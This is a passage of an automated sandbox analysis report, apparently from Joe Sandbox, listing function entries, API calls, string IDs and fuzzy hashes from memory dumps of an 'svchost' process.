                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_indent
                                                                                              • String ID: %s (%d)$unexpected value
                                                                                              • API String ID: 1715996925-1289549259
                                                                                              • Opcode ID: 6655d82fb737ad4558221fe7d857a957b5f4ea2486deba5950a07bd41afc27a2
                                                                                              • Instruction ID: 789b9536cce61a2758f0500748361e7ad1959e5244c693613dafe8ba4ca4e872
                                                                                              • Opcode Fuzzy Hash: 6655d82fb737ad4558221fe7d857a957b5f4ea2486deba5950a07bd41afc27a2
                                                                                              • Instruction Fuzzy Hash: 99F062B0A1E64283EB2A9B75D4515BC2A51BF44B84F44C031DE6D07BB58E7CA561D704
                                                                                              Function 00007FFBAB466F9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$Handshake done
                                                                                              • API String ID: 1322637139-3908905225
                                                                                              • Opcode ID: 773119932e0814d6e5d3013704d7a313269f5b9c811261945f28ea59a9917dc6
                                                                                              • Instruction ID: fd03efcf613e3578733f5a7e528840e4bcdcca82b0204bd0a56beebba43678f2
                                                                                              • Opcode Fuzzy Hash: 773119932e0814d6e5d3013704d7a313269f5b9c811261945f28ea59a9917dc6
                                                                                              • Instruction Fuzzy Hash: A7F01CE1E4A24241FE2AA735E4613FD13909F457A4F449436DE6D465A2DE3CE4C68200
                                                                                              Function 00007FFBAB4667B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$Padding
                                                                                              • API String ID: 1322637139-3812551105
                                                                                              • Opcode ID: 8fcc33ccdfee8de1e13c02cb3314ec5b2480997141a2a5f25eeb24d604b6c0f9
                                                                                              • Instruction ID: 36079d2728a47e3160643cfcef41cb954b7f955ec0c99fce5c775637c0e374df
                                                                                              • Opcode Fuzzy Hash: 8fcc33ccdfee8de1e13c02cb3314ec5b2480997141a2a5f25eeb24d604b6c0f9
                                                                                              • Instruction Fuzzy Hash: 08F01CD1E4A24281FA2AA735E4613BD13509B41794F549036DE2E465B2DE3CE4868201
                                                                                              Function 00007FFBAB498300 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_end_of_early_data
                                                                                              • API String ID: 1390262125-1059509600
                                                                                              • Opcode ID: 560050212a197dcc58c1741e5c055a236f108b8ce10d7eadae2156d1f2fbc594
                                                                                              • Instruction ID: b3b96355489124dfa70e13ae64ee6f2763c303f46660b3303c66d7fa50f86fc5
                                                                                              • Opcode Fuzzy Hash: 560050212a197dcc58c1741e5c055a236f108b8ce10d7eadae2156d1f2fbc594
                                                                                              • Instruction Fuzzy Hash: D9E0E6B1A1914252E752976AE4924F9A311AFD0740F844432DF2C435B79D68E5858700
                                                                                              Function 00007FFBAB4981D2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ossl_statem_server_pre_work$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 1390262125-3016895475
                                                                                              • Opcode ID: 8cea0a81d003a390121cb4e9fa3ca6797fbe56aa17a0677a7522c174ca79dbb3
                                                                                              • Instruction ID: f44dc74d6c17e418e15b67aa0638e57fadfc873c1b3ecc0d636fb1b63eb7cec5
                                                                                              • Opcode Fuzzy Hash: 8cea0a81d003a390121cb4e9fa3ca6797fbe56aa17a0677a7522c174ca79dbb3
                                                                                              • Instruction Fuzzy Hash: C3D012A1A1A04287E7639772D893AFA1250AF40344F40C835DE2D825B2DE6DE6858740
                                                                                              Function 64942770 Relevance: 6.3, APIs: 5, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 64942789
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 6494279F
                                                                                                • Part of subcall function 64941A20: EnterCriticalSection.KERNEL32 ref: 64941A36
                                                                                                • Part of subcall function 64941A20: LeaveCriticalSection.KERNEL32 ref: 64941A53
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64942803
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                              • String ID:
                                                                                              • API String ID: 2978645861-0
                                                                                              • Opcode ID: e6d460741ffd87fbcc524c01911827848854fb32983ebbc26eab718bd315e335
                                                                                              • Instruction ID: 839a74ca1950b2cb207cd67fc0816a519b1457acde348efc587b99345e1d84d6
                                                                                              • Opcode Fuzzy Hash: e6d460741ffd87fbcc524c01911827848854fb32983ebbc26eab718bd315e335
                                                                                              • Instruction Fuzzy Hash: D43146766907408BD7448F36D84079E77A6F78ABDCF188222DE2A87758EF39D096C710
                                                                                              Function 64945570 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              • Opcode ID: 84d1d499dd5c580db071729b4aff6c3732617e42b37efa82cf2e3daec4575e8e
                                                                                              • Instruction ID: f54dc3540dcdf39a3e766a566c17badb3a3e851a3ded68f22904b7f3e537b287
                                                                                              • Opcode Fuzzy Hash: 84d1d499dd5c580db071729b4aff6c3732617e42b37efa82cf2e3daec4575e8e
                                                                                              • Instruction Fuzzy Hash: 0521CC22BC611446FF5A9FF5E95037D16566F99BB8F580624CF2D4B3A4FF28C8828B00
                                                                                              Function 64945F50 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetHandleInformation.KERNEL32 ref: 64945F87
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleInformation
                                                                                              • String ID:
                                                                                              • API String ID: 1064748128-0
                                                                                              • Opcode ID: 70f363d5e4adba558b642a658e2de984ee0605ceb2eeecdc855e808291014c40
                                                                                              • Instruction ID: 79745a4ad5391706be20fe4235e8674050c91398eb3db706ed52aa63cfbd30a6
                                                                                              • Opcode Fuzzy Hash: 70f363d5e4adba558b642a658e2de984ee0605ceb2eeecdc855e808291014c40
                                                                                              • Instruction Fuzzy Hash: 9431A0213C150080FB11DF32ED403AA63AAEF94BD8F4445728E1D977A4EF39C986C321
                                                                                              Function 649472B0 Relevance: 6.1, APIs: 4, Instructions: 86timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 649472DB
                                                                                                • Part of subcall function 649456A0: WaitForSingleObject.KERNEL32 ref: 649456C4
                                                                                              • _errno.MSVCRT ref: 6494733E
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 6494735B
                                                                                              • _errno.MSVCRT ref: 649473B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem_errno$ObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 619567339-0
                                                                                              • Opcode ID: c903c4d7f9b72e94d93dbc11975c71b78c8edad599be5a2c54c4313e5523792b
                                                                                              • Instruction ID: 583b08ec4c6ea9d136f58fd54912cdfbde6537a34a37690e72838d8498947f60
                                                                                              • Opcode Fuzzy Hash: c903c4d7f9b72e94d93dbc11975c71b78c8edad599be5a2c54c4313e5523792b
                                                                                              • Instruction Fuzzy Hash: 4221EAB279464987DF1DEF39FD042596267A795BE4F58C231EE094BB98EA38C4418310
                                                                                              Function 00007FFBAB4448D0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: B_exCalc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                              • String ID:
                                                                                              • API String ID: 1900010111-0
                                                                                              • Opcode ID: 33580f98e1a4f0ee6f9f21e2b1bf04ba9079198bb15dc907ab785c7963e00336
                                                                                              • Instruction ID: 9da546a4ba6168ca75062ff0acf2c9da345b2fd263a70238d6bb7dd5218d1736
                                                                                              • Opcode Fuzzy Hash: 33580f98e1a4f0ee6f9f21e2b1bf04ba9079198bb15dc907ab785c7963e00336
                                                                                              • Instruction Fuzzy Hash: 4E41627671AA8286EBA58F36D4603AD73A0FB44B88F488035DE5D9B7A5DF3CD458C700
                                                                                              Function 64945E50 Relevance: 6.1, APIs: 4, Instructions: 68synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$Close$InformationObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 135186658-0
                                                                                              • Opcode ID: c30ba9446f7f4fa1be5e53161ebeb563100884b9ac3cb260c09908a3213b95ff
                                                                                              • Instruction ID: 3b7f193e5d864bfd26511a8a9e44dec223bbdd41615677f5d40ebcd1d534f3ba
                                                                                              • Opcode Fuzzy Hash: c30ba9446f7f4fa1be5e53161ebeb563100884b9ac3cb260c09908a3213b95ff
                                                                                              • Instruction Fuzzy Hash: 4221DE7238164095EB05CFB2E84835A2369EB94FBCF4482369F2D87798EF34C981C710
                                                                                              Function 00007FFBAB445010 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Calc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                              • String ID:
                                                                                              • API String ID: 2662037904-0
                                                                                              • Opcode ID: be2ce4ad4d8f74981af46178bf6be46a742416030eefa523c97b05687784e7fb
                                                                                              • Instruction ID: bf64ca641ba00d8db433d8a3df5e584199349a3fb8d6692993f97b7180e1377c
                                                                                              • Opcode Fuzzy Hash: be2ce4ad4d8f74981af46178bf6be46a742416030eefa523c97b05687784e7fb
                                                                                              • Instruction Fuzzy Hash: F71170A275AA8582FB61DB35E4A12AE3390FFC8B48F444032EE5D877A5DF2CD545C700
                                                                                              Function 64944CB0 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64944CCD
                                                                                              • GetProcessAffinityMask.KERNEL32 ref: 64944CDC
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64944D12
                                                                                              • SetProcessAffinityMask.KERNEL32 ref: 64944D1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: cb020629db8d9df8f43dbe50ffc33e56ce6b6f70c300bc2b20a6d5ce7658db5c
                                                                                              • Instruction ID: a28e0928b939d3290fc9391eb43c8c4365bbbae0e382f54d2b97f9d83160bf69
                                                                                              • Opcode Fuzzy Hash: cb020629db8d9df8f43dbe50ffc33e56ce6b6f70c300bc2b20a6d5ce7658db5c
                                                                                              • Instruction Fuzzy Hash: BFF0F033780A1456EF264F2AF80039F6395BB88B8CF890134DE8C47360EE3EC556CA10
                                                                                              Function 64947210 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System_errno$File
                                                                                              • String ID:
                                                                                              • API String ID: 2046127076-0
                                                                                              • Opcode ID: 865d12a501b8b53ec2b4ffe41e8b0cc87b075d7569cf6ad6906a412f6eef4b1d
                                                                                              • Instruction ID: 9b2965fae3bff372d08399535a378afc7e62826f71c7462fdf77964becce744f
                                                                                              • Opcode Fuzzy Hash: 865d12a501b8b53ec2b4ffe41e8b0cc87b075d7569cf6ad6906a412f6eef4b1d
                                                                                              • Instruction Fuzzy Hash: 670126B139060583DF152F35ED0432BA396BB86B99F058321E92A8ABD4EF3DC4108B10
                                                                                              Function 00007FFBAA01AC78 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2847513785.00007FFBA9DF8000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFBA9CD0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2847494716.00007FFBA9CD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2847513785.00007FFBA9CD1000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2847753443.00007FFBAA01B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2847870900.00007FFBAA116000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2847889608.00007FFBAA117000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2847947644.00007FFBAA118000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2847966206.00007FFBAA11A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2847985695.00007FFBAA11E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffba9cd0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                              • String ID:
                                                                                              • API String ID: 2933794660-0
                                                                                              • Opcode ID: 433c8d796f7dbfaa30b33fdd26296c3a8614dd24921e54f212f1ee0b781c75b1
                                                                                              • Instruction ID: e584f56e44a086628c5fb67a8b54abc25f3d8823dac30fe18adcb0a46716e7aa
                                                                                              • Opcode Fuzzy Hash: 433c8d796f7dbfaa30b33fdd26296c3a8614dd24921e54f212f1ee0b781c75b1
                                                                                              • Instruction Fuzzy Hash: DD118C62B05F02C9EB018B70E8442A837B8FB0A758F440E36DE6D427A4DF38D1668350
                                                                                              Function 00007FFBAB424FC0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_$E_add_lookupP_ctrl_exR_pop_to_markR_set_mark
                                                                                              • String ID:
                                                                                              • API String ID: 3663983608-0
                                                                                              • Opcode ID: 135ad2358095351e0334d5d2e2c2bc71690ac24f215a49cf4de52d59c4524a4f
                                                                                              • Instruction ID: 99e9d2054135409e487b96de0864a5ba7c9e9db2d6a9d0c39e95da513c5a30be
                                                                                              • Opcode Fuzzy Hash: 135ad2358095351e0334d5d2e2c2bc71690ac24f215a49cf4de52d59c4524a4f
                                                                                              • Instruction Fuzzy Hash: 3EF0A9A2A0A74242EB619775F08175D6350EF88BD4F458131FF5C077AAEE3CD4444704
                                                                                              Function 00007FFBAB41A6B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrl
                                                                                              • String ID: ssl\s3_msg.c$v
                                                                                              • API String ID: 3605655398-2542064467
                                                                                              • Opcode ID: a4d6dcf6aadac775b40b2e3e810d1e09ce69368ff7b43572e540d2d845c54ad3
                                                                                              • Instruction ID: a2f3f80d947ed4527ec09a6eb240aa8b721ed5499c722204a3ea31476085a170
                                                                                              • Opcode Fuzzy Hash: a4d6dcf6aadac775b40b2e3e810d1e09ce69368ff7b43572e540d2d845c54ad3
                                                                                              • Instruction Fuzzy Hash: 59718372A0968186E761CF35E0417AD77A0FB49B88F184136DFAC87B99DF3DD5848B10
                                                                                              Function 64947890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • Address %p has no image-section, xrefs: 64947897, 649479E2
                                                                                              • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
